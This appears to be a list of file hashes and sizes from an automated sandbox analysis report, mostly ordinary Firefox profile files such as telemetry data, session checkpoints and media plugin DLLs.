SHA256d2738c7948ed153455b4c2f727573870dd32be3528e77ee17916eb19c23687c1
SHA51221f48c45fd9e016941e187b57846fa005fed7d2403ba1d7e16aefbc24c42ac7433d7f602f5320019bb941234a3204cb4a34c25643a4ceb7578b73a29372ae7cb
-
Filesize
11KB
MD5bd127e2a25f95d1808bffcd8e7ff055c
SHA12bde111029bd23b134236f0f3e38b9f5cedd913c
SHA25621b6537cf2111a4dc13b105ea22572787f11882e9e6182678f195a91477604db
SHA5121ad1b93e3b46eb1cb2faab9267b5c32ea451bddf3474c90ebbe8ba551c8f5598bb85175aa5b707305da2099b36ed54a600aa0cbc8f74d4fcfd9833108b757aa7
-
Filesize
493KB
MD5c2a5f7d31335b26aefd212e632a97c4e
SHA1d2408609220c6e2aac3131ef73b23ace3719a031
SHA2561aa827824e1f24ed649e5cfdb4c638ea761c7b84cacf8b242a8990f17d2baa0d
SHA512b2252d0152690484b439f167fa0fa0a6553e0bf92704bb6e806058cc6f2fd1cc3fe10fafeb70c91781c0e5633cb4f94425ea7cefcaf8a56d5efbd2adc48869ff
-
Filesize
15KB
MD527536cf50e181747a089f404013a16ac
SHA1396afb49eb904dfd5e96930c922780453aad50f6
SHA2563ed5e9f61f174f4af9cc17f1456bc4e3d564ed286bd523e9a7239264ab7c7ac9
SHA51231b8e938fdbee497bfa9735cae02c2c3c376ea17e3a90a44441170a3eb07c6f656cb97f317914c430079165959403e0e1de7f68df4234fd89e9bd023a99154d9
-
Filesize
1.3MB
MD5e5a597c85765349100b6787d818c473a
SHA1d7488d9d01a4d226eba0751ab60ca802818d5a71
SHA256d089dd5de7292d45619049baa8efca8eac3aedbf1ee8d3b0c485b309f6f3df01
SHA5129904d06733e3cf18380834133630e423643c8b7cb0276f8991322a2bf4a1ce9d9ba9186fb7a8b28d991ea17d72d9af8be27ee77198133126d7cc19a0653675e1
-
Filesize
17KB
MD554c5af06409bd70275a4bfcbb0b17b33
SHA13222f2abb26246f9e533067c933130f9d434f377
SHA256e3c8dbac1dfd65ef0e78b3e9a2556c6ce345547aa0a5d150a55911147c04c3c6
SHA512069c3b68dafadf6952cdf734fdc45a667f9d330b9b6ef366970847502c39ffc0d498cd176a32ac6341e54c5d6cdc9ea85f1e800e4ccb859ee58012327aeb9c35
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
330KB
MD5aee2a2249e20bc880ea2e174c627a826
SHA1aa87ed4403e676ce4f4199e3f9142aeba43b26d9
SHA2564d9c00fc77e231366228a938868306a71383967472d0bbf1a89afe390d80599c
SHA5124e96c2aa60cc1904ac5c86389f5d1226baf4ef81e2027369979ec253b383eccc666da268647843d1db128af16d1504cdc7c77757ad4147a0332ec9f90041a110
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
Filesize18KB
MD5be95fe654bf499c5dad7d2548507c301
SHA1c3a4453b8eba6d419c83be3124857211dddf7f1d
SHA256c6cead83aca0212ad879b8eb0a68e2240eb81635717598b80610df15392695e1
SHA5123596a009a3fe8499bcbc7e43d607d4bfefe26b425418eb9c69921855ee546ad14dd81415cd29d9cdc36bfd4c8fa60345c57aea70f764deca53e725570827b6eb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\AlternateServices.bin
Filesize10KB
MD5dacb9d824b6fc5bb6f6f9daff21fca03
SHA1a625150e6d908ceb2111cda9a6fad4322ed873a9
SHA25610ec3f400bcad3b717e0e70a1e8591b71a0e1512426d8d0f704593689433c8ff
SHA512f680d618a611ba398c595d0c824d98c598e35507c8c694e75730f26d964d870a1b2b2cca4a86e0997f356d44d969852193d09b24adbc3693c7f3503f616a2099
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\broadcast-listeners.json
Filesize221B
MD565c47ba05520f945199ab7176a4b51da
SHA198d6462634fa3823c05ae5c857b5df3c7b55799d
SHA256cfdbed896cf1d77872bfb53b5ef478dd860718598541ac4c28f72f611ad49cf1
SHA512896ab5ef35bd245c2c25d78815a7fdb04d02d17e8f2f8a565c8558222d4794f3bbaa45e177e80af6b2d1bf4955e8356dd241d6662ebf32e072a120cf83e48690
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD52840c8642c16dd68417903fc5c1c09b7
SHA124eef4ee37627627469f2dfa7a7cbaa0a372e08e
SHA256e30b1a675345637b42dca98f73e68d3a54cc05f640acb0da489f026ba677cfcd
SHA512d67c49cd787e7b356e59213748d55e412301840896c6a0a2e6e10a183f87d51d99b50343782066f2cfa65d93442129321aa314336bbd801bfb0fc5ff33ca5f3c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize29KB
MD56b04132b692df4311229c94ea7f39c45
SHA16fdcf40c62f7305b7a57194ebbe0d6ebe809a6c5
SHA256e614011bb169c870cf65866e274572471062a9f46a6bdc7a5d2cd093d1e5a248
SHA512928d65e8fb36ac98e747bf62af0a9b635ae4496cb206d90e6eceb560f9fd2718213b33606e9ca812bd3643a52c58f2d172b5263669972a4b55ea7026684f0476
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD50eae1871399af9d604a5c893978975e8
SHA1ea93f0d955e101aa8181b4824ca645537eb0ca2f
SHA256ca52153a8fb2ef62cef4a6ffdec89c6381816326754500d6ea6c98d479e48919
SHA51214496a1937fd9f27a01caefe6907af9c1a15590c569040fd8b8735ce95621631a24b9414233cfe039f4d8689194f391865d6307f5fc6fc78db2427120caae023
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize27KB
MD50e1a0e2770f58b6ad23e39f2e4f74510
SHA18e330e674c5c6cf4001be9601c1dace380997d85
SHA256e28d42f0b58b133c5f2480417cbc6e2ff9abd53daf728a9497ad8ada24b21ef8
SHA512149c77f234f5c9c19c789e11a4d784a726749a06b0ffc25f9160ff4313a4a3ed909bd66ad8fe40108a0296bbb72e6b8574ef31e044182a1193c41b491b85ab74
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD52c3875a5971dc057d1f8a941ea245c4a
SHA1f4ddc580fb05a61c6bb4d5e1683df18ee25c74a3
SHA2563beeed622844cdcc12fe53270f65baf14ec29bbae2cee6646cd25dcbcac2a3ea
SHA512f3c14897269cb774224a8b1c6d85d92b44d2abd37c81c748756a42bdcfb3219e1de0fd256fcc67e01c0ea3e25d0b2a70fa5039e138e1b4575a6c23802915fd58
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize27KB
MD5bd08b2245f24add2013911e8845f1185
SHA107622fe51b7c799c63ebd26e3d4b7b7c6533091e
SHA25607d503bd2383e1bf541453a2d9e3e475b1e6b5b5789a609b6b4d3c494ac86648
SHA5124491c20fe022635d991b635b9f53ca80ae6178d79b7af9b8659dfd76a577f2f2e4a63ef89173061c09dcea3b826e23f4f54147b6bbe14175a7a8d2434300b29e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize27KB
MD51b85b659750bd8b0052b4ab681878e71
SHA15a5f73da4c85d9d20f7a3292af48d4faeff684b4
SHA256d803424fcbed967b09db575218a42e750e09e91b956a1b97c66ba5ea221c4f68
SHA512c8ec28ea054f4d91641864385f61bf4d6b9bfb82b3c92477ee24fbf21b0b02487a2aeacd03ce59c542b870db624671d7b9e43b9d125acc49ad3da1c8498b5db0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize27KB
MD5bd355fa9fcab1ee44029ef50ef0a6e4b
SHA1c0426daa438f055d1138b52c266b6b9e43954414
SHA25646549d21a6d718554749630fe3eccd1f3a9083e6cf3c8eb4132a13d6a197b3bf
SHA51228b2b463bf021f92c76be97ffb2b0e02f857d13fef3cdc5ce69e01ae08d80e5f013c87370dcb74143256bac502fff6d8079c2677d3383d18b428d78ef8d10057
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\db\data.safe.tmp
Filesize26KB
MD5c326c25f568fbc542517c4c16ba2bd82
SHA1c4a1ce04abca6868e9a4aeb66c9f05ed8e6abb5c
SHA256663ab8641a801d6e3becb16c3e33c9a2cdccdb3cc62bcf1526157300541dbee7
SHA5124778a14f1a73172f06305010f82a8cb3afaaf168f06f772d60369beb177220b1a8afea0b5a3ff1b953479d506b36aa8495ef6cb692887d4fbafce2b2a60033a4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\2a28b698-c757-428f-a615-29d057b1a06f
Filesize788B
MD5c0a7ee7714c4ebe37e757d87f9a5a2a3
SHA18d4f4444af7ee15e36cab0030cf1877b5c8d1adb
SHA25634137bc797e6dc5ac22c1c3c74b951c75b443b42b807321624087c613a1a02c6
SHA512b8f0966cf1f1ac936cbf98cebe8476a49729f086a645f83929bb06d8a844f9aa82a119072a67a489225ce2d7b1be042b9b7949e6836e7f4315f6793d73d68798
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\2b516412-5c9e-4da6-95d9-91a22f9c8a28
Filesize791B
MD5f54145c22133abd73fd3cce103f399f9
SHA1772cb7accb7028d64c0948e4727ad6516c9e3a94
SHA256917d14f2b5b50baa3e93b0518ada029db90e305aabd5b5aa0bef12b8b6389e3a
SHA512d1c9f64f45ebc31053cc4d18c89c774558b06eda5d249039f6cc7b25ea544237183b21e662d52adde9fbf6cb6e0e434acd17a443807b0584114db4ac971b5e0d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\55928e1e-1231-4bea-94d0-bb4a2a39d7e8
Filesize671B
MD541476619284ca6a030da891ed93888a3
SHA1ccf32db91a33f91fd06c966561b867490ecc44e7
SHA2564afedc9fe97b837d5a4f69ccb4fa930e54ef415507baec66a697482ea7de0968
SHA5129af57c980505f91b94ac23942fbb02b76052188dc56fa3981312312b55cb2fad76512854fdfdac93eefcc04fd76d27ebcf01164c0e19cc6f538ffb5bbd9de0c9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\63df2f08-e6c2-4e3e-815d-ff686e3e0b51
Filesize27KB
MD5836fce9ce5458ba3696b85d349522c95
SHA1c7d9d8965329f9dcf573bebede762421e4b5a2af
SHA25617846c5388c488cc91a692449a09ba823dfe5b978629b61642004d6754f54856
SHA51297deec170f26a283933e260bcf23f09ac58280d33541997e706c1f2f4edba0c2e3b45309d4d3914b6f9ae102aaf0262b2a65371cb8004ef1660ebbcc34c163ec
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\68974ed1-32ac-48e1-b090-a128e7ed3ef8
Filesize982B
MD5bf1d8a52f4d770e32f46331183fe00ba
SHA127a9a8c848bac8dccd52628469a8f05ec3b43e96
SHA256717bc86561c93f410bea714e6bc8bcefd8a65b5a427d95ae8a84e75f40776f72
SHA5129cab43c5288e30c589180cd60b3b85a897c218513c57e9b14bacad1fc4e7536d7490cb7ea2a7169fff165cc7a8049ef0327cc389f3d8277a1d82e26214f99210
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d002d2ae-5e7b-4cc3-aa10-1840b9930761
Filesize1KB
MD598828e4a192c92d838915cd5b7942dd0
SHA1ebf99263e3302b8e38a79e0e1e3bc88ccf411f27
SHA256cb03cdbabea771b5ecc7ebdb5981151e1876d6c9e71edc537bb9d4fbaf58a73e
SHA51268c5b355e5c9731c6c1c37f61f62a0258f8fd8d84f5149ddb684d979a24b694f2d940a24a2489b9e177a36547c9cade0d92c01313aa447c05dbabd7aefd813c5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\datareporting\glean\pending_pings\d05bec15-76f6-4371-8350-67fc8dce685c
Filesize661B
MD5b7bd44d1de2eb946a368638c70b5d554
SHA1256d2e6042149e46eee5658d8c4cadab883a6e01
SHA256530e7d4798390bfd3ac05eac48d31919edd09737f6f0965205d55184178f810d
SHA512ea86e5cae90df0b090051a50e293af9482a937d15a9b9f9f0ee119531f5a51ecc777d20d1680c335c3c4aafae23c01375f62a4e774b2506103ddbb2144b4dbb8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
10KB
MD5e95e8b618c3b1d6b5f7816f69c28e4c7
SHA1c189c6eb9212327bf577b984fe15c8abbacda463
SHA256946fe2a31254a981ed8f288852e385b71dcb79e3826c04e9cd14babf21464074
SHA512feca99d466ec4a6cf6ea687102381c6a3fa109ea3c70ac89d1cbbf27664afc2f768b0fcbfce2cad31880934572f1547f4d8204a33f4581613756675f15e49bf3
-
Filesize
14KB
MD5afad37f89dea4110d45a9ff51fa0bafd
SHA1a524b578586aa45ee792ac482ef82d18d4ae8faf
SHA2560ff08c3099d781d3753d0cbba381edc4ce3b37955cde6369cb3946ff6ce7b7eb
SHA512dab16c83b6310ea16170fcf9ef64eb54289960c3bde055d8be244f2eb2190a8992f45b6b77ba2dbb838d3f86459829e911379462b3785cd3417cf22a395d47af
-
Filesize
14KB
MD549ba0030f5775063671388b8b3ad5d47
SHA1e25f7f4192889502f17e41bee03529291a6f357e
SHA256cc190d8ae923343df9a5f8ff8bfe64641f275d9649164d29364dc38ab2cddbab
SHA51245b761f1f760efe4711b704bb4c666eb49a0a907d01ce75d4b399f31712bbe1b9e3096e314ae017b2b612d0961dddc797accb9ec2924ac30972a17d769ba282f
-
Filesize
9KB
MD5a52ef0aaaa5679fa4ed8a1950900f8a5
SHA1290b2b608f9e6bf6c6adf462a5626d630e1a5cd8
SHA2568244445388c737cc55714d37f858eac230e3960c4a61e7c09e2bac6147cc69cb
SHA512cbc559a2fa14880954402bfb1d73e816bd63169e82b6a5651561079518941453ae6aa77f4040eef35ac6c3ac5dbcc4300757e444bb98e934ca6112e92699c9a8
-
Filesize
9KB
MD582b257c9c9c95cb4ce648692110e97f0
SHA1421182f0dd7ba390dbdaad824cd8f810a7404979
SHA2560122f038e74aa73397534a882dfb07ecd4f769aba67f3205115a78512dd2d801
SHA51214bb24bd707013ee592af748a20fceecf9304e216c8566013650cfa8db06b9d1b114b052593f5d6d943a7aa8970da1282a558613ce4e7f618935d176df3e6a54
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\sessionCheckpoints.json
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o7z8hwau.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize9.5MB
MD5e1368cdf25b14f79150f9108e38035b9
SHA1ee6cfc6a72f1a818d83631b2776205012de2d0b1
SHA2563f142c2e2a297c425ca8ade06901e24a7811230a98808a8097130409b3703162
SHA512d154056c45eafc1136c8f51c0fa13f29561d300c3b7509370a8dbe1a14487c133f38c85bb5c2c7d0f7d40645595d5d137b5b8e4b2d2f20a2df312788ae97b602